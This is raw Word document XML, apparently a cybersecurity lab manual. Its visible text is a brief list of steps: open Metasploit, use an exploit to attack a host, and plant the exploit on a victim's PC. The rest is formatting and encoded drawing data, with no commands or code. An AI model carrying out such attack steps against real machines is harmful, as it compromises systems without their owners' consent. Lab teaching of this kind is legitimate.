        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Download and open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Use exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> to attack the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Create the exploit and add the exploit to the victim’s PC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5781675" cy="49053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4E44" w:rsidRPr="00D4195F" w:rsidSect="00E60381">
      <w:footerReference w:type="default" r:id="rId89"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="620" w:right="1040" w:bottom="1440" w:left="1220" w:header="0" w:footer="881" w:gutter="0"/>
      <w:pgBorders w:offsetFrom="page">
        <w:top w:val="single" w:sz="18" w:space="24" w:color="000000"/>
        <w:left w:val="single" w:sz="18" w:space="24" w:color="000000"/>
        <w:bottom w:val="single" w:sz="18" w:space="24" w:color="000000"/>
        <w:right w:val="single" w:sz="18" w:space="24" w:color="000000"/>
      </w:pgBorders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60A42" w:rsidRDefault="00360A42">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00360A42" w:rsidRDefault="00360A4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519C" w:rsidRDefault="00E643D1">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN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 46" o:spid="_x0000_s4115" type="#_x0000_t202" style="position:absolute;margin-left:70.8pt;margin-top:729pt;width:262.8pt;height:25.8pt;z-index:-12301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g8wmwIAAI0FAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1vmzAQ/j5p/8Hyd8pLCAmopGpDmCZ1&#10;L1K3H+CACdbAZrYT6Kr9951NSNJWk6ZtfLAO+/zcPXeP7/pmaBt0oFIxwVPsX3kYUV6IkvFdir9+&#10;yZ0lRkoTXpJGcJriR6rwzertm+u+S2ggatGUVCIA4SrpuxTXWneJ66qipi1RV6KjHA4rIVui4Vfu&#10;3FKSHtDbxg08L3J7IctOioIqBbvZeIhXFr+qaKE/VZWiGjUphty0XaVdt2Z1V9ck2UnS1aw4pkH+&#10;IouWMA5BT1AZ0QTtJXsF1bJCCiUqfVWI1hVVxQpqOQAb33vB5qEmHbVcoDiqO5VJ/T/Y4uPhs0Ss&#10;THEcBRhx0kKTUBiZwvSdSuD8oQMPPdyJARpsSaruXhTfFLi4Fz7jBWW8t/0HUQIQ2WthbwyVbE15&#10;gDACGOjE46n6dNCogM3ZbLaYR3BUwNksWERgmxAkmW53Uul3VLTIGCmW0F2LTg73So+uk4sJxkXO&#10;mgb2SdLwZxuAOe5AbLhqzkwWtmFPsRdvlptl6IRBtHFCL8uc23wdOlHuL+bZLFuvM/+nieuHSc3K&#10;knITZhKPH/5Zc44yHtt+ko8SDSsNnElJyd123Uh0ICDe3H7Hgly4uc/TsPUCLi8o+UHo3QWxk0fL&#10;hRPm4dyJF97S8fz4Lo68MA6z/Dmle8bpv1NCPehqHsxH1fyWm2e/19xI0jIN46FhbYqXJyeS1JSU&#10;G17a1mrCmtG+KIVJ/1wKaPfUaCtYo9FRrXrYDoBiVLwV5SNIVwpQFogQZhoYtZA/MOphPqRYfd8T&#10;STFq3nN4gGaYTIacjO1kEF7A1RRrjEZzrcehs+8k29WAPL4kLm7hiVTMqvecxfFhwZu3JI7zyQyV&#10;y3/rdZ6iq18AAAD//wMAUEsDBBQABgAIAAAAIQCK+Upq4gAAAA0BAAAPAAAAZHJzL2Rvd25yZXYu&#10;eG1sTI/BTsMwEETvSPyDtUjcqNOIuCXEqVBRxQFxaKFSj9vYxBGxHcVu6v492xPcdnZHs2+qVbI9&#10;m/QYOu8kzGcZMO0arzrXSvj63DwsgYWITmHvnZZw0QFW9e1NhaXyZ7fV0y62jEJcKFGCiXEoOQ+N&#10;0RbDzA/a0e3bjxYjybHlasQzhdue51kmuMXO0QeDg14b3fzsTlbCfj1s3tPB4MdUqLfXfLG9jE2S&#10;8v4uvTwDizrFPzNc8QkdamI6+pNTgfWkH+eCrNehWFIrsgixyIEdaVVkTwJ4XfH/LepfAAAA//8D&#10;AFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAED+DzCbAgAAjQUAAA4AAAAAAAAAAAAAAAAALgIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIr5SmriAAAADQEAAA8AAAAAAAAAAAAAAAAA9QQA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAEBgAAAAA=&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="00780195">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:line="264" w:lineRule="exact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  <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 45" o:spid="_x0000_s4114" type="#_x0000_t202" style="position:absolute;margin-left:432.25pt;margin-top:728.7pt;width:113.75pt;height:14pt;z-index:-12299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452oQIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1v2yAQ/j5p/wHx3bWdESe24lRNHE+T&#10;uhep2w8gNo7RbPCAxO6m/fcduE7TVpOmbXxABxzHPfc83Op6aBt0YkpzKVIcXgUYMVHIkotDir98&#10;zr0lRtpQUdJGCpbie6bx9fr1q1XfJWwma9mUTCEIInTSdymujekS39dFzVqqr2THBBxWUrXUwFId&#10;/FLRHqK3jT8LgsjvpSo7JQumNexm4yFeu/hVxQrzsao0M6hJMeRm3KzcvLezv17R5KBoV/PiIQ36&#10;F1m0lAt49Bwqo4aio+IvQrW8UFLLylwVsvVlVfGCOQyAJgyeobmracccFiiO7s5l0v8vbPHh9Ekh&#10;XqY4jkKMBG2BJETmtjB9pxM4v+vAwwwbOQDBDqTubmXxVYOLf+EzXtDWe9+/lyUEokcj3Y2hUq0t&#10;DwBGEAaYuD9Xnw0GFTY2ISSazTEq4CxcLJaBo8enyXS7U9q8ZbJF1kixAnZddHq61cZmQ5PJxT4m&#10;ZM6bxjHciCcb4DjuwNtw1Z7ZLBxhP+Ig3i13S+KRWbTzSJBl3k2+JV6Uh4t59ibbbrPwp303JEnN&#10;y5IJ+8wknpD8GTkPMh5pP8tHy4aXNpxNSavDftsodKIg3twNSwskf+HmP03DHQOWZ5DCGQk2s9jL&#10;o+XCIzmZe/EiWHpBGG/iKCAxyfKnkG65YP8OCfWgqzlw6uD8FlvgxktsNGm5gfbQ8DbFIAcY44et&#10;GS13onTUGsqb0b4ohU3/sRRQsYloJ1ir0VGtZtgPTv3hJPi9LO9BwUqCwECm0NrAqKX6jlEPbSLF&#10;+tuRKoZR807AP7Q9ZTLUZOwng4oCrqbYYDSaWzP2nmOn+KGGyOOHEvIGfkrFnYjtlxqzAAR2AV/f&#10;YXloU7a3XK6d12MzXf8CAAD//wMAUEsDBBQABgAIAAAAIQDi9q5G4gAAAA4BAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/BTsMwEETvSPyDtUjcqEOUtCHEqVBRxQFxaKFSj268xBHxOord1P17nBMcd+Zp&#10;dqZaB9OzCUfXWRLwuEiAITVWddQK+PrcPhTAnJekZG8JBVzRwbq+valkqeyFdjjtfctiCLlSCtDe&#10;DyXnrtFopFvYASl633Y00sdzbLka5SWGm56nSbLkRnYUP2g54EZj87M/GwGHzbB9D0ctP6Zcvb2m&#10;q911bIIQ93fh5RmYx+D/YJjrx+pQx04neyblWC+gWGZ5RKOR5asM2IwkT2ncd5q1Is+A1xX/P6P+&#10;BQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJwnjnahAgAAlAUAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAOL2rkbiAAAADgEAAA8AAAAAAAAAAAAA&#10;AAAA+wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAKBgAAAAA=&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="0015039B">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:line="264" w:lineRule="exact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519C" w:rsidRDefault="00E643D1">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN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4098" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:184.2pt;height:21.5pt;z-index:-122056;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical:top;mso-position-vertical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dlQoAIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNuOmzAQfa/Uf7D8znIJuYCWrLohVJW2&#10;F2nbD3CwCVbBprYT2Fb9945NyGZ3Valqy4M12OPjOTNn5vpmaBt0ZEpzKTIcXgUYMVFKysU+w18+&#10;F94KI22IoKSRgmX4gWl8s3796rrvUhbJWjaUKQQgQqd9l+HamC71fV3WrCX6SnZMwGElVUsM/Kq9&#10;TxXpAb1t/CgIFn4vFe2ULJnWsJuPh3jt8KuKleZjVWlmUJNhiM24Vbl1Z1d/fU3SvSJdzctTGOQv&#10;omgJF/DoGSonhqCD4i+gWl4qqWVlrkrZ+rKqeMkcB2ATBs/Y3NekY44LJEd35zTp/wdbfjh+UojT&#10;DCdRhJEgLRQJLWxe+k6ncHzfgYMZbuUA9XUcdXcny68aXPwLn/GCtt67/r2kgEMORrobQ6Vamx3g&#10;iwAGCvFwTj4bDCphM5rNkniWYFTCWbSchbPIRuGTdLrdKW3eMtkia2RYQXEdOjneaTO6Ti72MSEL&#10;3jSwT9JGPNkAzHEH3oar9sxG4er1IwmS7Wq7ir04Wmy9OMhz702xib1FES7n+SzfbPLwp303jNOa&#10;U8qEfWbSThj/WW1OKh6rflaPlg2nFs6GpNV+t2kUOhLQbuG+U0Iu3PynYbh8AZdnlMIoDm6jxCsW&#10;q6UXF/HcS5bBygvC5DZZBHES58VTSndcsH+nhHqQ1Tyaj6r5LbfAfS+5kbTlBqZDw9sMr85OJK0Z&#10;oVtBXWkN4c1oX6TChv+YCij3VGgnWKvRUa1m2A1O/OFyUvxO0geQsJKgMNApjDYwaqm+Y9TDmMiw&#10;/nYgimHUvBPQh3amTIaajN1kEFHC1QwbjEZzY8bZc+gU39eAPHaUkG+gVSruVGx7aozi1GDQ+o7M&#10;aUzZ2XL577weh+n6FwAAAP//AwBQSwMEFAAGAAgAAAAhAMigOqTdAAAABwEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMjzFPwzAUhHck/oP1kNiondAACnEqVFQxIIYWkBjd2MQR8XNku6n773lMdDzd6e67&#10;ZpXdyGYT4uBRQrEQwAx2Xg/YS/h439w8AItJoVajRyPhZCKs2suLRtXaH3Fr5l3qGZVgrJUEm9JU&#10;cx47a5yKCz8ZJO/bB6cSydBzHdSRyt3ISyHuuFMD0oJVk1lb0/3sDk7C53ravOYvq97mSr88l/fb&#10;U+iylNdX+ekRWDI5/YfhD5/QoSWmvT+gjmwkvSwLikqgR2RXhaiA7SUsbwXwtuHn/O0vAAAA//8D&#10;AFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAACd2VCgAgAAlAUAAA4AAAAAAAAAAAAAAAAALgIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMigOqTdAAAABwEAAA8AAAAAAAAAAAAAAAAA+gQA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAEBgAAAAA=&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRPr="00D569E9" w:rsidRDefault="00E5519C" w:rsidP="00D569E9"/>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap anchorx="page" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id="_x0000_s4097" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:736.95pt;width:113.75pt;height:14pt;z-index:-12203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TJkoQIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1v2yAQ/j5p/wHx3fXLSGJbdao2jqdJ&#10;3YvU7QcQG8doNnhAYnfT/vsOXKdpq0nTNj6gA47jnnse7vJq7Fp0ZEpzKTIcXgQYMVHKiot9hr98&#10;LrwYI22oqGgrBcvwPdP4av361eXQpyySjWwrphAEETod+gw3xvSp7+uyYR3VF7JnAg5rqTpqYKn2&#10;fqXoANG71o+CYOkPUlW9kiXTGnbz6RCvXfy6ZqX5WNeaGdRmGHIzblZu3tnZX1/SdK9o3/DyIQ36&#10;F1l0lAt49BQqp4aig+IvQnW8VFLL2lyUsvNlXfOSOQyAJgyeoblraM8cFiiO7k9l0v8vbPnh+Ekh&#10;XmU4iUKMBO2AJLSwdRl6ncLxXQ8OZryRI/DrMOr+VpZfNbj4Zz7TBW29d8N7WUEcejDS3Rhr1dnq&#10;AF4EYYCI+1Px2WhQaWMTQpbRAqMSzsLVKg4cOz5N59u90uYtkx2yRoYVkOui0+OtNjYbms4u9jEh&#10;C962juBWPNkAx2kH3oar9sxm4fj6kQTJNt7GxCPRcuuRIM+962JDvGURrhb5m3yzycOf9t2QpA2v&#10;KibsM7N2QvJn3DyoeGL9pB4tW17ZcDYlrfa7TavQkYJ2CzcsLZD8mZv/NA13DFieQQojEtxEiVcs&#10;45VHCrLwklUQe0GY3CTLgCQkL55CuuWC/TskNICsFsCpg/NbbIEbL7HRtOMGukPLuwyDHGBM/7Vh&#10;tNqKylFrKG8n+6wUNv3HUkDFZqKdYK1GJ7WacTc68YfxrPidrO5BwkqCwkCn0NrAaKT6jtEAbSLD&#10;+tuBKoZR+07AP7Q9ZTbUbOxmg4oSrmbYYDSZGzP1nkOv+L6ByNOPEvIavkrNnYrtn5qyAAh2AV/f&#10;gXloU7a3nK+d12MzXf8CAAD//wMAUEsDBBQABgAIAAAAIQCY8ON54wAAAA4BAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/BTsMwEETvSPyDtUjcqN1C0ibEqVBRxQFxaAGJ4zY2cURsR7Gbun/P9gS3Hc1o&#10;9k21TrZnkx5D552E+UwA067xqnOthI/37d0KWIjoFPbeaQlnHWBdX19VWCp/cjs97WPLqMSFEiWY&#10;GIeS89AYbTHM/KAded9+tBhJji1XI56o3PZ8IUTOLXaOPhgc9Mbo5md/tBI+N8P2NX0ZfJsy9fK8&#10;WO7OY5OkvL1JT4/Aok7xLwwXfEKHmpgO/uhUYL2EVV7QlkjGw/K+AHaJiCLPgB3oysS8AF5X/P+M&#10;+hcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDFXTJkoQIAAJQFAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCY8ON54wAAAA4BAAAPAAAAAAAAAAAA&#10;AAAAAPsEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACwYAAAAA&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox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519C" w:rsidRDefault="00E643D1">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN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 6" o:spid="_x0000_s4113" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:184.2pt;height:21.5pt;z-index:-114864;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical:top;mso-position-vertical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U76nQIAAJIFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNuOmzAQfa/Uf7D8znKJcwEtWXVDqCpt&#10;L9K2H+CACVbBprYT2Fb9945NyGZ3Valqy4M1eMbHc2aO5/pmaBt0ZEpzKVIcXgUYMVHIkot9ir98&#10;zr0VRtpQUdJGCpbiB6bxzfr1q+u+S1gka9mUTCEAETrpuxTXxnSJ7+uiZi3VV7JjApyVVC018Kv2&#10;fqloD+ht40dBsPB7qcpOyYJpDbvZ6MRrh19VrDAfq0ozg5oUQ27GrcqtO7v662ua7BXtal6c0qB/&#10;kUVLuYBLz1AZNRQdFH8B1fJCSS0rc1XI1pdVxQvmOACbMHjG5r6mHXNcoDi6O5dJ/z/Y4sPxk0K8&#10;hN4RjARtoUdoYcvSdzoB730HfjPcygFCHEXd3cniq4YQ/yJmPKBt9K5/L0vAoQcj3YmhUq0tDtBF&#10;AAN9eDjXng0GFbAZzWYxmcUYFeCLlrNwFtksfJpMpzulzVsmW2SNFCvorUOnxzttxtApxF4mZM6b&#10;BvZp0ognG4A57sDdcNT6bBauXT/iIN6utivikWix9UiQZd6bfEO8RR4u59ks22yy8Ke9NyRJzcuS&#10;CXvNJJ2Q/FlrTiIem34Wj5YNLy2cTUmr/W7TKHSkIN3cfaeCXIT5T9Nw9QIuzyiFEQluo9jLF6ul&#10;R3Iy9+JlsPKCML6NFwGJSZY/pXTHBft3SqhPcTyP5qNqfsstcN9LbjRpuYHh0PA2xatzEE1qRsut&#10;KF1rDeXNaF+Uwqb/WApo99RoJ1ir0VGtZtgNTvtOalbMO1k+gIKVBIGBTGGwgVFL9R2jHoZEivW3&#10;A1UMo+adgFdoJ8pkqMnYTQYVBRxNscFoNDdmnDyHTvF9DcjjgxLyDbyUijsRP2Zxel/w8B2X05Cy&#10;k+Xy30U9jtL1LwAAAP//AwBQSwMEFAAGAAgAAAAhAMigOqTdAAAABwEAAA8AAABkcnMvZG93bnJl&#10;di54bWxMjzFPwzAUhHck/oP1kNiondAACnEqVFQxIIYWkBjd2MQR8XNku6n773lMdDzd6e67ZpXd&#10;yGYT4uBRQrEQwAx2Xg/YS/h439w8AItJoVajRyPhZCKs2suLRtXaH3Fr5l3qGZVgrJUEm9JUcx47&#10;a5yKCz8ZJO/bB6cSydBzHdSRyt3ISyHuuFMD0oJVk1lb0/3sDk7C53ravOYvq97mSr88l/fbU+iy&#10;lNdX+ekRWDI5/YfhD5/QoSWmvT+gjmwkvSwLikqgR2RXhaiA7SUsbwXwtuHn/O0vAAAA//8DAFBL&#10;AQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBl&#10;c10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxz&#10;Ly5yZWxzUEsBAi0AFAAGAAgAAAAhAJHFTvqdAgAAkgUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9l&#10;Mm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMigOqTdAAAABwEAAA8AAAAAAAAAAAAAAAAA9wQAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAABBgAAAAA=&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 6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margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 5" o:spid="_x0000_s4112" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:736.95pt;width:113.75pt;height:14pt;z-index:-11384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FBvnwIAAJIFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtunDAQfa/Uf7D8ToCt9wIKGyXLUlVK&#10;L1LaD/Bis1gFm9rehbTqv3dswmaTqFLVlgc09ozHc+Ycz+XV0DboyLURSmY4vogw4rJUTMh9hr98&#10;LoIVRsZSyWijJM/wPTf4av361WXfpXymatUwrhEkkSbtuwzX1nZpGJqy5i01F6rjEpyV0i21sNT7&#10;kGnaQ/a2CWdRtAh7pVmnVcmNgd18dOK1z19VvLQfq8pwi5oMQ23W/7X/79w/XF/SdK9pV4vyoQz6&#10;F1W0VEi49JQqp5aigxYvUrWi1Mqoyl6Uqg1VVYmSewyAJo6eobmracc9FmiO6U5tMv8vbfnh+Ekj&#10;wYA7YErSFjhCc9eWvjMpeO868NvhRg0Q4iGa7laVXw2EhGcx4wHjonf9e8UgDz1Y5U8MlW5dcwAu&#10;gjTAw/2p93ywqHS5CSGL2RyjEnzxcrmKPDkhTafTnTb2LVctckaGNXDrs9PjrbGuGppOIe4yqQrR&#10;NJ7fRj7ZgMBxB+6Go87nqvB0/UiiZLvarkhAZottQKI8D66LDQkWRbyc52/yzSaPf7p7Y5LWgjEu&#10;3TWTdGLyZ9Q8iHgk/SQeoxrBXDpXktH73abR6EhBuoX/HC1Q/FlY+LQM7wYszyDFMxLdzJKgWKyW&#10;ASnIPEiW0SqI4uQmWUQkIXnxFNKtkPzfIaE+w8kcOPVwfost8t9LbDRthYXh0Ig2wyAH+MbnWnPK&#10;tpJ5ai0VzWiftcKV/9gK6NhEtBes0+ioVjvsBq/9N5Pgd4rdg4K1AoGBTGGwgVEr/R2jHoZEhs23&#10;A9Uco+adhFfoJspk6MnYTQaVJRzNsMVoNDd2nDyHTot9DZnHByXVNbyUSngRuyc1VgEI3AIevsfy&#10;MKTcZDlf+6jHUbr+BQAA//8DAFBLAwQUAAYACAAAACEAmPDjeeMAAAAOAQAADwAAAGRycy9kb3du&#10;cmV2LnhtbEyPwU7DMBBE70j8g7VI3KjdQtImxKlQUcUBcWgBieM2NnFEbEexm7p/z/YEtx3NaPZN&#10;tU62Z5MeQ+edhPlMANOu8apzrYSP9+3dCliI6BT23mkJZx1gXV9fVVgqf3I7Pe1jy6jEhRIlmBiH&#10;kvPQGG0xzPygHXnffrQYSY4tVyOeqNz2fCFEzi12jj4YHPTG6OZnf7QSPjfD9jV9GXybMvXyvFju&#10;zmOTpLy9SU+PwKJO8S8MF3xCh5qYDv7oVGC9hFVe0JZIxsPyvgB2iYgiz4Ad6MrEvABeV/z/jPoX&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAzJBQb58CAACSBQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAmPDjeeMAAAAOAQAADwAAAAAAAAAAAAAA&#10;AAD5BAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAkGAAAAAA==&#10;" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 5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519C" w:rsidRDefault="00E643D1">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E643D1">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN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 42" o:spid="_x0000_s4109" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:185.15pt;height:17.75pt;z-index:-122920;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical:top;mso-position-vertical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whMnwIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1vmzAQ/j5p/8Hyd8JLCA2opGpCmCZ1&#10;L1K3H+CACdbAZrYT6Kr9951NSNNWk6ZtfLAO+/z4nrvn7vpmaBt0pFIxwVPszzyMKC9Eyfg+xV+/&#10;5M4SI6UJL0kjOE3xA1X4ZvX2zXXfJTQQtWhKKhGAcJX0XYprrbvEdVVR05aomegoh8NKyJZo+JV7&#10;t5SkB/S2cQPPi9xeyLKToqBKwW42HuKVxa8qWuhPVaWoRk2KITZtV2nXnVnd1TVJ9pJ0NStOYZC/&#10;iKIljMOjZ6iMaIIOkr2CalkhhRKVnhWidUVVsYJaDsDG916wua9JRy0XSI7qzmlS/w+2+Hj8LBEr&#10;UxwvoFSctFAkFAYmMX2nEji/78BDD2sxQIEtSdXdieKbAhf3wme8oIz3rv8gSgAiBy3sjaGSrUkP&#10;EEYAA5V4OGefDhoVsBnMF/7cDzEq4CwIFtHcN1G4JJlud1Lpd1S0yBgpllBdi06Od0qPrpOLeYyL&#10;nDUN7JOk4c82AHPcgbfhqjkzUdiCPcZevF1ul6ETBtHWCb0sc27zTehEuX+1yObZZpP5P827fpjU&#10;rCwpN89M